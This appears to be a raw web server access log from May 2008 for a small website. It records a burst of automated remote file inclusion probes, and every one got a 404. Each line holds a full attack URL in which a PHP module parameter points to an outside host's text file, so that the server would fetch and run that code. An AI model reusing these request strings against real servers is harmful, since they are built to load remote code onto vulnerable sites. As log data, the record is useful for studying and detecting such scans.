217.31.58.188 - - [18/May/2008:19:44:14 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:44:14 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:44:18 -0700] "GET /logs/access_080211.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:44:19 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:44:19 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:26 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:27 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:27 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:44:34 -0700] "GET /logs/access_071224.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.188.60.54 - - [18/May/2008:19:44:36 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.188.60.54 - - [18/May/2008:19:44:36 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:44:37 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:38 -0700] "GET /logs/access_080211.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:39 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:44:41 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
58.26.137.64 - - [18/May/2008:19:44:46 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
58.26.137.64 - - [18/May/2008:19:44:47 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:44:57 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:19:44:58 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:19:44:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
64.38.4.3 - - [18/May/2008:19:45:00 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "neighborhoodglimpses.com"
64.38.4.3 - - [18/May/2008:19:45:01 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:45:09 -0700] "GET /logs/access_071112.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/